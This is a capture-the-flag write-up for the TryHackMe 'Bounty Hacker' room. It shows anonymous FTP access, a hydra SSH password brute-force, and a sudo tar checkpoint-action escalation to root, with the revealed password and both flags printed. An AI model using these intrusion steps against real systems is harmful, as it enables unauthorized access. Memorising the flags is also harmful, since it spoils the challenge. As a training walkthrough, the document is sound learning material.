Bounty Hacker
TryHackMe
You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!
#
Preparation
First of all, I registered the IP address into my /etc/hosts file to create a virtual domain. This ensure me to perform enumeration steps without the need to remember every single number in it.
$ sudo echo "10.10.1.216 bountyhacker.test" >> /etc/hosts#
Enumeration
I used rustscan from now on because somehow nmap keep throwing me a segmentation fault. Running the command, I found 3 open ports: 21, 22 and 80.
$ rustscan -a bountyhacker.test --ulimit 5000 | tee rustscan.log.----. .-. .-. .----..---. .----. .---. .--. .-. .-.| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| || .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'The Modern Day Port Scanner.________________________________________: https://discord.gg/GFrQsGy :: https://github.com/RustScan/RustScan :--------------------------------------Real hackers hack time ⌛[~] The config file is expected to be at "/home/ql/.rustscan.toml"[~] Automatically increasing ulimit value to 5000.Open 10.10.194.35:22Open 10.10.194.35:21Open 10.10.194.35:80[~] Starting Script(s)[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-02 13:54 WIBInitiating Ping Scan at 13:54Scanning 10.10.194.35 [2 ports]Completed Ping Scan at 13:54, 3.00s elapsed (1 total hosts)Nmap scan report for 10.10.194.35 [host down, received no-response]Read data files from: /usr/bin/../share/nmapNote: Host seems down. If it is really up, but blocking our ping probes, try -PnNmap done: 1 IP address (0 hosts up) scanned in 3.07 secondsI tried to log in into the ftp using anonymous credential and it works
$ ftp bountyhacker.testConnected to bountyhacker.test220 (vsFTPd 3.0.3)Name (bountyhacker.test:ql): anonymous230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp>I tried to list the directory in hope to find useful files inside it, and yes, there is indeed useful files for me to use
ftp> ls229 Entering Extended Passive Mode (|||9699|)ftp: Can't connect to `10.10.194.35:9699': Connection timed out 200 EPRT command successful. Consider using EPSV.150 Here comes the directory listing.-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt226 Directory send OK.I downloaded those two files to my local machine by using get
ftp> get locks.txt # task.txtLooking at task.txt, I found a note and the name who created the task
$ cat task.txt 1.) Protect Vicious.2.) Plan for Red Eye pickup on the moon.-linLooking at locks.txt, it looks like a list of password sort of thing
$ cat locks.txtrEddrAGONReDdr4g0nSynd!cat3Dr@gOn$yn9icat3R3DDr46ONSYndIC@TeReddRA60NR3dDrag0nSynd1c4tedRa6oN5YNDiCATEReDDR4g0n5ynDIc4teR3Dr4gOn2044RedDr4gonSynd1cat3R3dDRaG0Nsynd1c@T3Synd1c4teDr@g0nreddRAg0NREddRaG0N5yNdIc47eDra6oN$yndIC@t34L1mi6H71StHeB357rEDdragOn$ynd1c473DrAgoN5ynD1cATEReDdrag0n$ynd1cateDr@gOn$yND1C4TeRedDr@gonSyn9ic47eREd$yNdIc47edr@goN5YNd1c@73rEDdrAGOnSyNDiCat3r3ddr@g0NReDSynd1ca7eUsing the locks.txt file, I used hydra to brute-force lin's ssh to obtain the password
$ hydra -I -l lin -P locks.txt ssh://bountyhacker.test | tee hydra.log...[22][ssh] host: bountyhacker.test login: lin password: RedDr4gonSynd1cat3...#
Gaining The Shell
Using lin's credential, I gained access to the shell
$ ssh lin@bountyhacker.testWelcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)* Documentation: https://help.ubuntu.com* Management: https://landscape.canonical.com* Support: https://ubuntu.com/advantage83 packages can be updated.0 updates are security updates.Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14lin@bountyhacker:~/Desktop$ #
Capturing User Flag
This part is the easiest to do since the file is in the same directory as lin. I only need to execute this command
lin@bountyhacker:~$ cat user.txtTHM{CR1M3_SyNd1C4T3}#
Elevating The Privilege
I checked Lin's sudo privilege and figured out that she has access to /bin/tar executable as root.
lin@bountyhacker:~/Desktop$ sudo -lMatching Defaults entries for lin on bountyhacker:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser lin may run the following commands on bountyhacker: (root) /bin/tarAfter a little bit of googling, I figured out a way to escalate the privilege.
lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shtar: Removing leading `/' from member names# whoamiroot# #
Capturing Root Flag
And just like that, I got full control of the machine
# cat /root/root.txtTHM{80UN7Y_h4cK3r}That's it, my mission on bountyhacker is done. Thanks for reading and if you were following along, well done!